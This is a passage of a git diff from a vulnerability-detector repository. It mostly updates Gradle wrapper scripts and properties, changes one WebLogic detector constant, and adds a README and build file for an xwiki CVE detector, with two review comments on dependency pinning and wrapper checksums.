"$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/vbulletin/cve201916759/gradlew.bat b/google/detectors/rce/vbulletin/cve201916759/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/vbulletin/cve201916759/gradlew.bat +++ b/google/detectors/rce/vbulletin/cve201916759/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/weblogic/cve202014883/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/weblogic/cve202014883/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/weblogic/cve202014883/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/weblogic/cve202014883/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/weblogic/cve202014883/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/weblogic/cve202014883/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/weblogic/cve202014883/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/weblogic/cve202014883/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/weblogic/cve202014883/gradlew b/google/detectors/rce/weblogic/cve202014883/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/weblogic/cve202014883/gradlew +++ b/google/detectors/rce/weblogic/cve202014883/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/weblogic/cve202014883/gradlew.bat b/google/detectors/rce/weblogic/cve202014883/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/weblogic/cve202014883/gradlew.bat +++ b/google/detectors/rce/weblogic/cve202014883/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/weblogic/cve202014883/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202014883/WebLogicAdminConsoleRceDetector.java b/google/detectors/rce/weblogic/cve202014883/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202014883/WebLogicAdminConsoleRceDetector.java index b7b5775a2..13f477654 100644 --- a/google/detectors/rce/weblogic/cve202014883/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202014883/WebLogicAdminConsoleRceDetector.java +++ b/google/detectors/rce/weblogic/cve202014883/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202014883/WebLogicAdminConsoleRceDetector.java 
@@ -70,7 +70,7 @@ public final class WebLogicAdminConsoleRceDetector implements VulnDetector { "", "unknown", // nmap could not determine the service name, we try to exploit anyway. "afs3-callback"); // most /etc/services list port 7001 as afs3-callback service - @VisibleForTesting static final String VULNERABILITY_REPORT_PUBLISHER = "Google"; + @VisibleForTesting static final String VULNERABILITY_REPORT_PUBLISHER = "GOOGLE"; @VisibleForTesting static final String VULNERABILITY_REPORT_ID = "CVE_2020_14883"; @VisibleForTesting diff --git a/google/detectors/rce/xwiki/cve202431982/README.md b/google/detectors/rce/xwiki/cve202431982/README.md new file mode 100644 index 000000000..e87e8eb1e --- /dev/null +++ b/google/detectors/rce/xwiki/cve202431982/README.md @@ -0,0 +1,14 @@ +# CVE-2024-31982 RCE for xwiki + +This detector checks whether an xwiki instance is vulnerable to RCE-2024-31982 +which allows unauthenticated code execution. + +## Build jar file for this plugin + +Using `gradlew`: + +```shell +./gradlew jar +``` + +Tsunami identifiable jar file is located at `build/libs` directory. diff --git a/google/detectors/rce/xwiki/cve202431982/build.gradle b/google/detectors/rce/xwiki/cve202431982/build.gradle new file mode 100644 index 000000000..2f6c9666b --- /dev/null +++ b/google/detectors/rce/xwiki/cve202431982/build.gradle 
@@ -0,0 +1,83 @@
+plugins {
+ id 'java-library'
+}
+
+description = 'Tsunami VulnDetector plugin for CVE-2024-31982.'
+group = 'com.google.tsunami'
+version = '0.0.1-SNAPSHOT'
+
+repositories {
+ maven { // The google mirror is less flaky than mavenCentral()
+ url 'https://maven-central.storage-download.googleapis.com/repos/central/data/'
+ }
+ mavenCentral()
+ mavenLocal()
+}
+
+java {
+ sourceCompatibility = JavaVersion.VERSION_11
+ targetCompatibility = JavaVersion.VERSION_11
+
+ jar.manifest {
+ attributes('Implementation-Title': name,
+ 'Implementation-Version': version,
+ 'Built-By': System.getProperty('user.name'),
+ 'Built-JDK': System.getProperty('java.version'),
+ 'Source-Compatibility': sourceCompatibility,
+ 'Target-Compatibility': targetCompatibility)
+ }
+
+ javadoc.options {
+ encoding = 'UTF-8'
+ use = true
+ links 'https://docs.oracle.com/javase/8/docs/api/'
+ source = '8'
+ }
+
+ // Log stacktrace to console when test fails.
+ test {
+ testLogging {
+ exceptionFormat = 'full'
+ showExceptions true
+ showCauses true
+ showStackTraces true
+ }
+ maxHeapSize = '1500m'
+ }
+}
+
+ext {
+ floggerVersion = '0.5.1'
+ guavaVersion = '28.2-jre'
+ javaxInjectVersion = '1'
+ jsoupVersion = '1.9.2'
+ okhttpVersion = '3.12.0'
+ protobufVersion = '3.11.4'
+ tsunamiVersion = 'latest.release'
+
+ junitVersion = '4.13'
+ mockitoVersion = '2.28.2'
+ truthVersion = '1.0.1'
+}
+
+dependencies {
+ implementation "com.google.flogger:flogger:${floggerVersion}"
+ implementation "com.google.flogger:google-extensions:${floggerVersion}"
+ implementation "com.google.flogger:flogger-system-backend:${floggerVersion}"
+ implementation "com.google.guava:guava:${guavaVersion}"
+ implementation "com.google.protobuf:protobuf-java:${protobufVersion}"
+ implementation "com.google.protobuf:protobuf-javalite:${protobufVersion}"
+ implementation "com.google.protobuf:protobuf-java-util:${protobufVersion}"
+ implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}"
+ implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}"
+ implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}"
+ implementation "javax.inject:javax.inject:${javaxInjectVersion}"
+ implementation "org.jsoup:jsoup:${jsoupVersion}"
+
+ testImplementation "com.google.truth:truth:${truthVersion}"
+ testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}"
+ testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}"
+ testImplementation "com.squareup.okhttp3:mockwebserver:${okhttpVersion}"
+ testImplementation "junit:junit:${junitVersion}"
+ testImplementation "org.mockito:mockito-core:${mockitoVersion}"
+}
diff --git a/google/detectors/rce/xwiki/cve202431982/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/xwiki/cve202431982/gradle/wrapper/gradle-wrapper.jar
new file mode 100644
index 000000000..2c3521197
Binary files /dev/null and b/google/detectors/rce/xwiki/cve202431982/gradle/wrapper/gradle-wrapper.jar differ
diff --git a/google/detectors/rce/xwiki/cve202431982/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/xwiki/cve202431982/gradle/wrapper/gradle-wrapper.properties
new file mode 100644
index 000000000..d04736436
--- /dev/null
+++ b/google/detectors/rce/xwiki/cve202431982/gradle/wrapper/gradle-wrapper.properties
@@ -0,0 +1,7 @@
+distributionBase=GRADLE_USER_HOME
+distributionPath=wrapper/dists
+distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip
+networkTimeout=10000
+validateDistributionUrl=true
+zipStoreBase=GRADLE_USER_HOME
+zipStorePath=wrapper/dists
diff --git a/google/detectors/rce/xwiki/cve202431982/gradlew b/google/detectors/rce/xwiki/cve202431982/gradlew
new file mode 100755
index 000000000..f5feea6d6
--- /dev/null
+++ b/google/detectors/rce/xwiki/cve202431982/gradlew
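Review bot: `tsunamiVersion = 'latest.release'` in the `ext` block of the new build.gradle is a dynamic version, so the three `com.google.tsunami` artifacts resolve to whatever is newest at build time and the plugin build is not reproducible. With `mavenLocal()` also listed in `repositories`, an artifact sitting in the builder's local Maven cache can be picked up as well. I would pin an exact release, `tsunamiVersion = '<pinned-tsunami-release>'`, drop `mavenLocal()` unless local snapshots are really needed, and consider Gradle dependency verification for the remaining coordinates. Separately, `'Built-By': System.getProperty('user.name')` in `jar.manifest` writes the builder's account name into every published jar; I would remove that attribute.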
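Review bot: The new xwiki `gradle-wrapper.properties` fetches `gradle-7.0-bin.zip` without a `distributionSha256Sum` entry, so the wrapper runs the downloaded distribution without checking it against a known hash; `validateDistributionUrl=true` only validates the URL. I would add `distributionSha256Sum=<sha256 of gradle-7.0-bin.zip from the Gradle release checksums>` below `distributionUrl`. The same omission is in the WebLogic wrapper properties hunk earlier in this diff, and the committed `gradle-wrapper.jar` binaries are worth checking against the published wrapper checksums. `networkTimeout` and `validateDistributionUrl` look like they come from a newer wrapper generation than 7.0, so it may be worth confirming that the wrapper and the distribution version are meant to differ.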
@@ -0,0 +1,252 @@ +#!/bin/sh + +# +# Copyright © 2015-2021 the original authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 +# + +############################################################################## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», 